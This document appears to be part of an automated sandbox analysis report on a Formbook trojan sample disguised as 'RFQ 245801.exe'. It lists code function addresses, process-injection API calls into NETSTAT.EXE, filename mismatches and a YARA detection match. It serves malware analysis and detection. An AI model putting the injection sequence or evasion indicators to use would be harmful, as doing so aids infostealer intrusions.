Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_026BA2EA NtCreateFile, 7_2_026BA2EA
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_026BA32A NtCreateFile, 7_2_026BA32A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_026BA3DA NtReadFile, 7_2_026BA3DA
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_026BA45E NtClose, 7_2_026BA45E
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_026BA50A NtAllocateVirtualMemory, 7_2_026BA50A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_02EE9BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose, 7_2_02EE9BAF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_02EEA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread, 7_2_02EEA036
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_02EE9BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 7_2_02EE9BB2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_02EEA042 NtQueryInformationProcess, 7_2_02EEA042
Detected potential crypto function
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 0_2_029EE828 0_2_029EE828
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 0_2_0733AAF8 0_2_0733AAF8
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 0_2_07332620 0_2_07332620
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 0_2_07332A58 0_2_07332A58
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 0_2_07332A48 0_2_07332A48
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 0_2_07334100 0_2_07334100
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 0_2_073321E8 0_2_073321E8
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 0_2_073349D8 0_2_073349D8
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 0_2_073349C7 0_2_073349C7
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 0_2_07330006 0_2_07330006
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_00401030 5_2_00401030
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0041D89D 5_2_0041D89D
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0041DA88 5_2_0041DA88
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0041DBA8 5_2_0041DBA8
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_00402D87 5_2_00402D87
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_00402D90 5_2_00402D90
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_00409E5B 5_2_00409E5B
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_00409E60 5_2_00409E60
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0041DFD5 5_2_0041DFD5
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0041E792 5_2_0041E792
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_00402FB0 5_2_00402FB0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017B8158 5_2_017B8158
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017CA118 5_2_017CA118
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01720100 5_2_01720100
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017E81CC 5_2_017E81CC
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017F01AA 5_2_017F01AA
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017E41A2 5_2_017E41A2
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017C2000 5_2_017C2000
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017EA352 5_2_017EA352
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0173E3F0 5_2_0173E3F0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017F03E6 5_2_017F03E6
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017D0274 5_2_017D0274
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017B02C0 5_2_017B02C0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01730535 5_2_01730535
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017F0591 5_2_017F0591
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017E2446 5_2_017E2446
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017D4420 5_2_017D4420
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017DE4F6 5_2_017DE4F6
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01730770 5_2_01730770
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01754750 5_2_01754750
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0172C7C0 5_2_0172C7C0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0174C6E0 5_2_0174C6E0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01746962 5_2_01746962
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017329A0 5_2_017329A0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017FA9A6 5_2_017FA9A6
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0173A840 5_2_0173A840
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01732840 5_2_01732840
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0175E8F0 5_2_0175E8F0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017168B8 5_2_017168B8
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017EAB40 5_2_017EAB40
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017E6BD7 5_2_017E6BD7
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0172EA80 5_2_0172EA80
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017CCD1F 5_2_017CCD1F
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0173AD00 5_2_0173AD00
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0172ADE0 5_2_0172ADE0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01748DBF 5_2_01748DBF
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01730C00 5_2_01730C00
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01720CF2 5_2_01720CF2
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017D0CB5 5_2_017D0CB5
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017A4F40 5_2_017A4F40
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01750F30 5_2_01750F30
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017D2F30 5_2_017D2F30
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01772F28 5_2_01772F28
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01722FC8 5_2_01722FC8
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017AEFA0 5_2_017AEFA0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01730E59 5_2_01730E59
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017EEE26 5_2_017EEE26
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017EEEDB 5_2_017EEEDB
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01742E90 5_2_01742E90
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017ECE93 5_2_017ECE93
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0171F172 5_2_0171F172
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017FB16B 5_2_017FB16B
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0176516C 5_2_0176516C
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0173B1B0 5_2_0173B1B0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017E70E9 5_2_017E70E9
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017EF0E0 5_2_017EF0E0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017DF0CC 5_2_017DF0CC
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017370C0 5_2_017370C0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0171D34C 5_2_0171D34C
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017E132D 5_2_017E132D
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0177739A 5_2_0177739A
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0174D2F0 5_2_0174D2F0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017D12ED 5_2_017D12ED
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0174B2C0 5_2_0174B2C0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017352A0 5_2_017352A0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017E7571 5_2_017E7571
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017F95C3 5_2_017F95C3
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017CD5B0 5_2_017CD5B0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01721460 5_2_01721460
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017EF43F 5_2_017EF43F
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017EF7B0 5_2_017EF7B0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01775630 5_2_01775630
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017E16CC 5_2_017E16CC
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01739950 5_2_01739950
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0174B950 5_2_0174B950
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017C5910 5_2_017C5910
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0179D800 5_2_0179D800
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017338E0 5_2_017338E0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017EFB76 5_2_017EFB76
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017A5BF0 5_2_017A5BF0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0176DBF9 5_2_0176DBF9
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0174FB80 5_2_0174FB80
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017A3A6C 5_2_017A3A6C
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017EFA49 5_2_017EFA49
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017E7A46 5_2_017E7A46
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017DDAC6 5_2_017DDAC6
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017CDAAC 5_2_017CDAAC
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01775AA0 5_2_01775AA0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017D1AA3 5_2_017D1AA3
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017E7D73 5_2_017E7D73
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017E1D5A 5_2_017E1D5A
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01733D40 5_2_01733D40
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0174FDC0 5_2_0174FDC0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017A9C32 5_2_017A9C32
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017EFCF2 5_2_017EFCF2
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017EFF09 5_2_017EFF09
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_016F3FD5 5_2_016F3FD5
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_016F3FD2 5_2_016F3FD2
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017EFFB1 5_2_017EFFB1
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01731F92 5_2_01731F92
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01739EB0 5_2_01739EB0
Source: C:\Windows\explorer.exe Code function: 6_2_0F6F1B32 6_2_0F6F1B32
Source: C:\Windows\explorer.exe Code function: 6_2_0F6F1B30 6_2_0F6F1B30
Source: C:\Windows\explorer.exe Code function: 6_2_0F6F7232 6_2_0F6F7232
Source: C:\Windows\explorer.exe Code function: 6_2_0F6EED02 6_2_0F6EED02
Source: C:\Windows\explorer.exe Code function: 6_2_0F6F4912 6_2_0F6F4912
Source: C:\Windows\explorer.exe Code function: 6_2_0F6FA5CD 6_2_0F6FA5CD
Source: C:\Windows\explorer.exe Code function: 6_2_0F6F6036 6_2_0F6F6036
Source: C:\Windows\explorer.exe Code function: 6_2_0F6ED082 6_2_0F6ED082
Source: C:\Windows\explorer.exe Code function: 6_2_0FBA8232 6_2_0FBA8232
Source: C:\Windows\explorer.exe Code function: 6_2_0FBAB5CD 6_2_0FBAB5CD
Source: C:\Windows\explorer.exe Code function: 6_2_0FBA2B32 6_2_0FBA2B32
Source: C:\Windows\explorer.exe Code function: 6_2_0FBA2B30 6_2_0FBA2B30
Source: C:\Windows\explorer.exe Code function: 6_2_0FBA5912 6_2_0FBA5912
Source: C:\Windows\explorer.exe Code function: 6_2_0FB9FD02 6_2_0FB9FD02
Source: C:\Windows\explorer.exe Code function: 6_2_0FB9E082 6_2_0FB9E082
Source: C:\Windows\explorer.exe Code function: 6_2_0FBA7036 6_2_0FBA7036
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_00642167 7_2_00642167
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_00641715 7_2_00641715
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_0319A352 7_2_0319A352
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_031A03E6 7_2_031A03E6
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_030EE3F0 7_2_030EE3F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03180274 7_2_03180274
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_031602C0 7_2_031602C0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_030D0100 7_2_030D0100
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_0317A118 7_2_0317A118
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03168158 7_2_03168158
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_031A01AA 7_2_031A01AA
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_031941A2 7_2_031941A2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_031981CC 7_2_031981CC
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03172000 7_2_03172000
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03104750 7_2_03104750
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_030E0770 7_2_030E0770
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_030DC7C0 7_2_030DC7C0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_030FC6E0 7_2_030FC6E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_030E0535 7_2_030E0535
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_031A0591 7_2_031A0591
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03184420 7_2_03184420
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03192446 7_2_03192446
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_0318E4F6 7_2_0318E4F6
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_0319AB40 7_2_0319AB40
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03196BD7 7_2_03196BD7
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_030DEA80 7_2_030DEA80
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_030F6962 7_2_030F6962
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_030E29A0 7_2_030E29A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_031AA9A6 7_2_031AA9A6
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_030E2840 7_2_030E2840
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_030EA840 7_2_030EA840
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_030C68B8 7_2_030C68B8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_0310E8F0 7_2_0310E8F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03100F30 7_2_03100F30
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03182F30 7_2_03182F30
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03122F28 7_2_03122F28
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03154F40 7_2_03154F40
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_0315EFA0 7_2_0315EFA0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_030D2FC8 7_2_030D2FC8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_0319EE26 7_2_0319EE26
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_030E0E59 7_2_030E0E59
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_0319CE93 7_2_0319CE93
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_030F2E90 7_2_030F2E90
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_0319EEDB 7_2_0319EEDB
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_0317CD1F 7_2_0317CD1F
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_030EAD00 7_2_030EAD00
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_030F8DBF 7_2_030F8DBF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_030DADE0 7_2_030DADE0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_030E0C00 7_2_030E0C00
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03180CB5 7_2_03180CB5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_030D0CF2 7_2_030D0CF2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_0319132D 7_2_0319132D
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_030CD34C 7_2_030CD34C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_0312739A 7_2_0312739A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_030E52A0 7_2_030E52A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_030FB2C0 7_2_030FB2C0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_031812ED 7_2_031812ED
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_030FD2F0 7_2_030FD2F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_031AB16B 7_2_031AB16B
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_0311516C 7_2_0311516C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_030CF172 7_2_030CF172
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_030EB1B0 7_2_030EB1B0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_030E70C0 7_2_030E70C0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_0318F0CC 7_2_0318F0CC
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_031970E9 7_2_031970E9
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_0319F0E0 7_2_0319F0E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_0319F7B0 7_2_0319F7B0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03125630 7_2_03125630
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_031916CC 7_2_031916CC
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03197571 7_2_03197571
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_0317D5B0 7_2_0317D5B0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_0319F43F 7_2_0319F43F
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_030D1460 7_2_030D1460
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_0319FB76 7_2_0319FB76
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_030FFB80 7_2_030FFB80
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03155BF0 7_2_03155BF0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_0311DBF9 7_2_0311DBF9
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_0319FA49 7_2_0319FA49
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03197A46 7_2_03197A46
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03153A6C 7_2_03153A6C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03125AA0 7_2_03125AA0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_0317DAAC 7_2_0317DAAC
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03181AA3 7_2_03181AA3
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_0318DAC6 7_2_0318DAC6
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03175910 7_2_03175910
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_030E9950 7_2_030E9950
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_030FB950 7_2_030FB950
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_0314D800 7_2_0314D800
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_030E38E0 7_2_030E38E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_0319FF09 7_2_0319FF09
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_030E1F92 7_2_030E1F92
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_0319FFB1 7_2_0319FFB1
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_030E9EB0 7_2_030E9EB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03191D5A 7_2_03191D5A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_030E3D40 7_2_030E3D40
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03197D73 7_2_03197D73
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_030FFDC0 7_2_030FFDC0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03159C32 7_2_03159C32
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_0319FCF2 7_2_0319FCF2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_026BE792 7_2_026BE792
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_026A9E60 7_2_026A9E60
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_026A9E5B 7_2_026A9E5B
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_026A2FB0 7_2_026A2FB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_026A2D87 7_2_026A2D87
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_026A2D90 7_2_026A2D90
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_02EEA036 7_2_02EEA036
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_02EEB232 7_2_02EEB232
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_02EE5B32 7_2_02EE5B32
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_02EE5B30 7_2_02EE5B30
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_02EE1082 7_2_02EE1082
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_02EE8912 7_2_02EE8912
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_02EEE5CD 7_2_02EEE5CD
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_02EE2D02 7_2_02EE2D02
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 0315F290 appears 103 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 030CB970 appears 262 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 0314EA12 appears 86 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 03115130 appears 58 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 03127E54 appears 102 times
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: String function: 017AF290 appears 103 times
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: String function: 01777E54 appears 107 times
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: String function: 0179EA12 appears 86 times
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: String function: 0171B970 appears 262 times
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: String function: 01765130 appears 58 times
PE / OLE file has an invalid certificate
Source: RFQ 245801.exe Static PE information: invalid certificate
Sample file is different than original file name gathered from version info
Source: RFQ 245801.exe, 00000000.00000002.1744400565.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs RFQ 245801.exe
Source: RFQ 245801.exe, 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs RFQ 245801.exe
Source: RFQ 245801.exe, 00000000.00000000.1688427062.00000000006CC000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameUsAH.exe, vs RFQ 245801.exe
Source: RFQ 245801.exe, 00000000.00000002.1753756214.00000000072B0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs RFQ 245801.exe
Source: RFQ 245801.exe, 00000005.00000002.1799554359.0000000001287000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenetstat.exej% vs RFQ 245801.exe
Source: RFQ 245801.exe, 00000005.00000002.1799523213.0000000001270000.00000040.10000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenamenetstat.exej% vs RFQ 245801.exe
Source: RFQ 245801.exe, 00000005.00000002.1799833129.000000000181D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs RFQ 245801.exe
Source: RFQ 245801.exe Binary or memory string: OriginalFilenameUsAH.exe, vs RFQ 245801.exe
Uses 32bit PE files
Source: RFQ 245801.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 5.2.RFQ 245801.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
